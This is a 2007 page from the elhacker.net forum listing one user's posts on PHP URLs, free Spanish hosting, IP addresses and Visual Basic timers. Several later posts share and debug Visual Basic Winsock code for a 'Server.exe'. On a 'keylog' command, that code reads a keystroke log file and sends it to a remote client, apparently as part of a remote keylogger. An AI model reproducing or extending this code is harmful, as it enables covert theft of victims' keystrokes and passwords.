elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6
31  Programación / PHP / Re: OGame clone? en: 21 Diciembre 2007, 15:14 pm
El UGamela está todavía en fase beta, no está acabado por eso es una *****.
Igualmente sí, tendrá exito, pero solo sino añades comandantes, etc... que ya sabes que eso fue lo que "mató" al ogame.
32  Programación / PHP / URL Direfente en: 21 Diciembre 2007, 15:01 pm
Hola he visto por ahí en muchas webs, URL's de este tipo:

Código:
http://www.web.es/index.php?site=news

Donde "site" puede ser otra palabra y donde "news" obviamente puede ser otra palabra.
Me gustaría saber como se hace ese tipo de URL, he buscado y buscado pero no llego a ninguna conclusión porque exactamente nose lo que busco es decir, no se como se le llama ese tipo de URL y buscar sin saber como se llama, pues ya me diréis...

Quisiera saber como se le llama a este tipo de URL's para yo buscar en google o que me pongais algún ejemplo de código.

Gracias de antemano, Saludos.
33  Programación / Programación Visual Basic / Re: Cambiar IP - ayuda en: 20 Diciembre 2007, 16:53 pm
Es imposible cambiar una IP fija, si tu ISP te asigna esa, con esa te quedas, no puedes obtener otra que yo sepa  :xD acaso que contactes con tu ISP.
34  Programación / Desarrollo Web / Re: Recomendando host en: 19 Diciembre 2007, 14:58 pm
Citar
ya me di cuenta T_T cuando me pidieron el CIF fui a la cocina el Desinfectante pero parece q eso no era

y luego de buscar corruculums de gente de españa para llenar todos los datos .. recibo un mensaje que decia.... "en breve lo llamaremos por telefono para que digite su numero....."

Puff... chau servidor ='(

kjakjajkkja xD


Exacto, para activar el pack gratuito debe ser mediante telefono, a los 5 minutos de haber creado la cuenta, te llama automaticamente una grabadora que te pide que teclees un codigo que te enviaron por correo.

Pero repito: Debes ser residente en España
35  Programación / Desarrollo Web / Re: Oferta en 1and1, registro de .es, hosting 2 años, etc.. y todo gratis. en: 6 Diciembre 2007, 01:55 am
Bueno os comento he encontrado esto y creo que es tan bueno que merece ser comentado aparte, he visto que hay creado un post para recomendar un Hosting pero creo que la historia está es tan buena que merece ser tratada aparte, mis disculpas a los administradores del foro si ellos no lo ven igual están en todo su derecho de cerrar este mensaje.

Pues eso me han comentado que 1and1 te deja registrar un .es gratis, y te da 2GB para la página, una transferencia mensual de 20GB 100 cuentas de correo con IMAP de 1GB 5 bases de datos MYMySQL, lo único que veo un poco así es que te indica acceso FTP y 50, todavia no lo he probado no se si te lo limitarán pero creo que no hay nada parecido, sin compromiso de permanencia,etc.

y todo sin pagar un € que es lo que cuenta.

os dejo el enlace para que lo mireís.

http://1and1.es

No es por hacer publicidad es para que nadie de está comunidad de dinero por algo que otro hace gratis.

saludos



Así es, facil sencillo y para toda la familia, yo tengo un pack bienvenida con ellos (se llama así porque al ser nuevos en España lanzaron ese pack gratuito) y la verdad es que va de lujazo, llevo ya 2 meses y no tengo de que quejarme, eso sí, si te pasas de la transferencia mensual debes pagar dicha diferencia. Y el plazo de registro acaba el 31 de diciembre y es solo para residentes en ESPAÑA.
36  Programación / Programación Visual Basic / Re: Ejecutar codigo cada 15 min en: 29 Septiembre 2007, 23:02 pm
No, el timer se ejecutará cada minuto, por lo tanto cada minuto le suma 1 a la variable "x" y a su ves cada minuto hace una comprobación de si dicha variable "x" es igual a 15, y entonces es cuando se cumpliría la condicion y saldría el msgbox.
37  Programación / Programación Visual Basic / Re: abrir txt leerlo y enviarlo en: 28 Enero 2007, 22:15 pm
muchas gracias E0N, ya lo pruebo mañana  :rolleyes: la verdad es que si, me fije que cuando el .txt llegaba a un cierto tamaño pues no lo enviaba todo, e iba a postear la duda pero como el foro me lleva unos dias dando problemas, supongo q a todos, pues hasta hice que cuando llegue a un cierto tamaño pues moviera el txt a otro directorio y crear otro nuevo y asi. pero mejor como tu lo hicistes, menos engorroso xD gracias ;)
38  Programación / Programación Visual Basic / Re: abrir txt leerlo y enviarlo en: 25 Enero 2007, 21:18 pm
bueno buscando y buscando encontre manuales y ejemplos en ingles y lo apliqué, lo pongo por aqui por si interesa:

Server.exe (DataArrival)
Código:
Private Sub WS_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
Dim keys As String
WS.GetData datos
If datos = "keylog" Then
Open "c:\archivo.txt" For Input As #1
While Not EOF(1)
Line Input #1, temp$
alltext$ = alltext$ & temp$ & vbCrLf
Wend
Text4.text = alltext$
Close #1
keys = Text4.text
WS.SendData "Keylog" & keys
End If
End Sub
39  Programación / Programación Visual Basic / Re: abrir txt leerlo y enviarlo en: 25 Enero 2007, 19:23 pm
esta linea me da un error :S
Código:
put #1, Text4.Text

me dice, Expected: list separator
40  Programación / Programación Visual Basic / Re: abrir txt leerlo y enviarlo en: 25 Enero 2007, 14:53 pm
me sigue dando el mismo error, me dice unsuported variant type, el error me da al darle al boton, q le puse ws.senddata keylog y lo de input #1, text4.text no me dejo ponerlo asi, tuve q meter text4.text en una variable, alguna sugerencia?

gracias
Páginas: 1 2 3 [4] 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines